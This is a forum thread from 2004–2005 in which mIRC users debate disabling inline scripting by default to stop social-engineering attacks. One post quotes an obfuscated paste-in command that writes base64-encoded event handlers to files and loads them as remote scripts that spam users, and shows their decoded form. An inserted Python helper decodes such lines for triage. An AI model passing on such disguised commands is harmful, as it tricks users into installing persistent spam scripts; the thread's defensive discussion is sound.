Security suggestions again #82732 11/05/04 04:23 PM
Joined: Feb 2004
Posts: 8
cmouse Offline OP
Nutrimatic drinks dispenser
It seems it would be nice if mIRC's security were enhanced. I know I've suggested a similar thing before, but this is a suggestion that does not destroy mIRC's capabilities.

1. Disable all kinds of "special features" by default, such as COM+, DDE, inline scripting etc etc. Anything that's dangerous.

2. To enable them, issue a warning that 'this is a dangerous thing you're doing blablabla...'

DDE already has this kind of functionality, which is nice. Would like to see the rest of the 'dangerous' stuff go into this though, such as inline scripting etc. Shouldn't be hard to do. Of course, disabling events & scripting as per default (you could enable them later on) would not be a bad idea either...

Also, a nice warning on execution of /load & /unload would be a pretty nice feature.

Re: Security suggestions again #82733 11/05/04 04:54 PM
Joined: Nov 2003
Posts: 2,327
tidy_trax Offline
Hoopy frood
Quote:
Also, a nice warning on execution of /load & /unload would be a pretty nice feature.


mIRC already has this (alt+r > options > initialization warning). All of your options wouldn't bother me as long as the warnings could be disabled, just like most of the other warnings in mIRC.


New username: hixxy
Re: Security suggestions again #82734 11/05/04 05:29 PM
Joined: Feb 2004
Posts: 8
cmouse Offline OP
Nutrimatic drinks dispenser
The warning should be enabled per default.

Re: Security suggestions again #82735 11/05/04 05:32 PM
Joined: Nov 2003
Posts: 2,327
tidy_trax Offline
Hoopy frood
It is.


New username: hixxy
Re: Security suggestions again #82736 11/05/04 05:58 PM
Joined: Jun 2003
Posts: 5,024
Mentality Offline
Hoopy frood
I was very pleased when the warning dialog was implemented for when people click URLs, and I agree where feasible more protection warnings should be put in.

However, I think if you had to disable everything that is dangerous you'd end up disabling most of mIRC by default, and as for most people (i.e. people coming in from MSN chat clients) mIRC is already confusing as it is, it would only increase this confusion if they kept getting warnings every 5 minutes.

DCC warnings, /load warnings and clicking URL warnings already come as standard with mIRC - I'm still of the opinion that at some point people have to take responsibility for themselves, and if they don't, they'll have to learn the hard way. Internet savvy users can only advise and help people and people such as Khaled can only do so much to their software to protect people from the dangers that exist on IRC/Internet. Some people just don't care - it's not a matter of letting them know what could happen and they suddenly get worried, they know about it - they just couldn't care less what happens to their computers. I've got friends who download Kazaa/iMesh and I try telling them in layman's terms about spyware - they simply shrug their shoulders.

No matter how much security you add to something some people seem almost determined to get infected/exploited/etc - that is of course not a reason to brush off your suggestion, what can be done should be done for those who DO care and are simply not aware of the dangers as it's not fair to put them through the inconvenience, annoyance and time-wasting of dealing with an infection. However, just thought I'd comment on the practicality of it - the theory's good, but it's not going to be a miracle worker.

My 2 cents.

Regards,


Mentality/Chris
Re: Security suggestions again #82737 12/05/04 09:25 AM
Joined: Dec 2002
Posts: 349
Skip Offline
Fjord artisan
I can't see the point. For the stock-standard mIRC 'viruses' to infect, they have to modify the mirc.ini to add their script. The locks could simply be switched off for the next time mIRC is run (IIRC the crop of server.ini-esque infections already switch off the 'initialization warning').

Or have I missed the point? :)

Re: Security suggestions again #82738 30/05/04 05:22 AM
Joined: Mar 2004
Posts: 5
eneearedee Offline
Nutrimatic drinks dispenser
How about locking the /remote command so that malicious scripts can't use an alias to override it.

Last edited by eneearedee; 30/05/04 05:22 AM.
Re: Security suggestions again #82739 30/05/04 10:04 AM
Joined: Dec 2002
Posts: 3,138
Collective Offline
Hoopy frood
/!remote will ignore any aliases and go straight to the built-in/server command.

Re: Security suggestions again #82740 29/06/05 11:36 AM
Joined: Feb 2004
Posts: 8
cmouse Offline OP
Nutrimatic drinks dispenser
Ok...

This is an old thread, but I hope this will pop up again.

The problem with inline scripting is the following:

//write Qbot.txt $decode(b24gKjp0ZXh0OipzZWVrKjojOi5pZ25vcmUgJG5pY2s=,m) | //write Qbot2.txt $decode(b24gKjp0ZXh0OipzZWVrKjojOi5tc2cgJG5pY2sgc3R1IHZlIDEgYm9uIHNpdGUgWCA7KSB3d3cubWFnYWxpZS5zdXJmMDcuY29t,m) | //write Qbot3.txt $decode(b24gKjpjb25uZWN0OnsgbXNnICMuY2hhbiBsb2xsbA==,m) | .load -rs Qbot.txt | .load -rs Qbot2.txt | .load -rs Qbot3.txt

+ a site / user telling the newbie user 'click thru any warnings, this will give you chanserv even if you are not the owner of the channel'. Or in QuakeNet: 'this will give you Q/L bot with owners even if someone else has registered the channel'.

If you write that, the script _WILL_ be loaded next time mIRC is run. The reason why inline scripting should be disabled is to prevent users from tricking other users into doing this. You cannot change how people think, you can change how software works.

I can't see ANY VALID REASON for scripting to work from "input box". Can't you make it at least disabled by default please? This is a very serious problem as these scripts affect people EVERY DAY.

Commands executed by these scripts
on *:text:*seek*:#:.ignore $nick
on *:text:*seek*:#:.msg $nick stu ve 1 bon site X ;)
on *:connect:{ msg #.chan lolll }

Last edited by Mentality; 29/06/05 11:53 AM.
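
Added example (not part of the thread and not mIRC code): a Python triage helper for the pattern described in the post above, where a pasted input-box line writes a `$decode(...,m)` (base64) payload to a file and then `/load -rs`es it. It expands the payload without executing anything and reports which event handler would be installed; the sample line, file name and function names are constructed for illustration.

```python
import base64
import re

# Constructed, harmless sample in the same shape as the line quoted in the post:
# write a base64-wrapped event handler to a file, then load it as a remote script.
_HANDLER = "on *:text:*hello*:#:.msg $nick example reply"
SAMPLE = ("//write demo.txt $decode(%s,m) | .load -rs demo.txt | //echo done"
          % base64.b64encode(_HANDLER.encode()).decode())

DECODE_RE = re.compile(r"\$decode\(([A-Za-z0-9+/=]+)\s*,\s*m\)", re.I)
WRITE_RE = re.compile(r"^[/.]*write\s+(?:-\S+\s+)?(\S+)\s+(.*)$", re.I)
LOAD_RE = re.compile(r"^[/.]*load\s+-r\S*\s+(\S+)", re.I)
EVENT_RE = re.compile(r"^\s*on\s+[^:\s]+:(\w+):", re.I)


def expand_decodes(text):
    """Show what each $decode(<base64>,m) would evaluate to, without running it."""
    def _sub(match):
        try:
            return base64.b64decode(match.group(1), validate=True).decode("latin-1")
        except ValueError:          # not valid base64: leave the call visible
            return match.group(0)
    return DECODE_RE.sub(_sub, text)


def triage(line):
    """Return one finding per file that the pasted line both writes and loads."""
    written, loaded = {}, []
    for cmd in re.split(r"\s\|\s", line):   # mIRC separates commands with " | "
        cmd = cmd.strip()
        w, l = WRITE_RE.match(cmd), LOAD_RE.match(cmd)
        if w:
            written.setdefault(w.group(1).lower(), []).append(w.group(2))
        elif l:
            loaded.append(l.group(1).lower())
    findings = []
    for name in loaded:
        for raw in written.get(name, []):
            script = expand_decodes(raw)
            event = EVENT_RE.match(script)
            findings.append({
                "file": name,
                "obfuscated": script != raw,
                "event": event.group(1).lower() if event else None,
                "script": script,
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A help-channel operator can run a line a user was told to paste through `triage()` and read the decoded handler before anyone types it into mIRC.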
Re: Security suggestions again #82741 29/06/05 11:40 AM
Joined: Dec 2002
Posts: 3,138
Collective Offline
Hoopy frood
Quote:
I can't see ANY VALID REASON for scripting to work from "input box".

Then you haven't thought about it very much.

Scripters use it for testing code, e.g. checking return values, e.g. //echo $custom_identifer(moo)
In help channels it is used to get information about a person's setup, e.g. "//say $os $ip"

If people are so inanely stupid as to type everything they're told to, they really shouldn't be on the internet. Keylogger -> Banking site, anyone?

Re: Security suggestions again #82742 29/06/05 11:42 AM
Joined: Feb 2004
Posts: 8
cmouse Offline OP
Nutrimatic drinks dispenser
Yes, but unfortunately there are about 150 000 stupid users in 200 000 users. If you'd told them to install a keylogger to improve their PC, they would. Newbies are stupid. The stupidity comes from not knowing what the other person is speaking about, and the victim buying it for its full price. Unfortunately people are inane and stupid. Especially when they come from MSN etc. I'd be more than pleased if users would be more careful, but they are not.

If you want to use it for debug purposes, I am quite sure you'd be able to click the little checkbox saying 'Enable inline scripting'

Last edited by cmouse; 29/06/05 11:47 AM.
Re: Security suggestions again #82743 29/06/05 04:23 PM
Joined: Apr 2004
Posts: 847
Sat Offline
Hoopy frood
Quote:
Yes, but unfortunately there are about 150 000 stupid users in 200 000 users. If you'd told them to install a keylogger to improve their PC, they would. (...) If you want to use it for debug purposes, I am quite sure you'd be able to click the little checkbox saying 'Enable inline scripting'

So what should mIRC do if the next generation of these malicious scripts/websites tells the "stupid" users to click that little checkbox as well? What if they start telling people to paste lines in Remote? According to your own statement, the "stupid" users will comply anyway.

This is a pointless arms race that reduces actual functionality, and therefore not something that mIRC should get into.


Saturn, QuakeNet staff
Re: Security suggestions again #82744 29/06/05 04:48 PM
Joined: Dec 2002
Posts: 208
Hrung Offline
Fjord artisan
Disabling a user's ability to do those commands from the command line won't help as much as you think. Those with malicious intent could just start supplying the actual .ini or .mrc and tell people how to load them (or the other methods Sat mentioned while I was writing this). As long as mIRC has a scripting engine at all, it will be possible to trick people that don't know what they are doing. But if mIRC scripting were to be removed, I bet that around 90% of users wouldn't upgrade to that. Kind of a catch-22, isn't it?

Btw, it isn't really right to say that these users are stupid. Too trusting? Sure. Don't know what they are doing? Absolutely. But no new user knows what they are doing right off the bat.

Look at it this way: the experience of being taken advantage of might actually be good for them! When they find out what they did (likely through being banned a few times) they may learn to be more careful, and will not be likely to do it again. Khaled just needs to make sure that these scripts cannot do permanent damage, and a lot of that has been done with the lock settings.

Don't get me wrong -- these spamming scripts are annoying, and I would be happy if they went away. But if that is all they do, I think that is worth someone learning a valuable life lesson in the end.


If I knew now what I will know then... maybe things will have been different...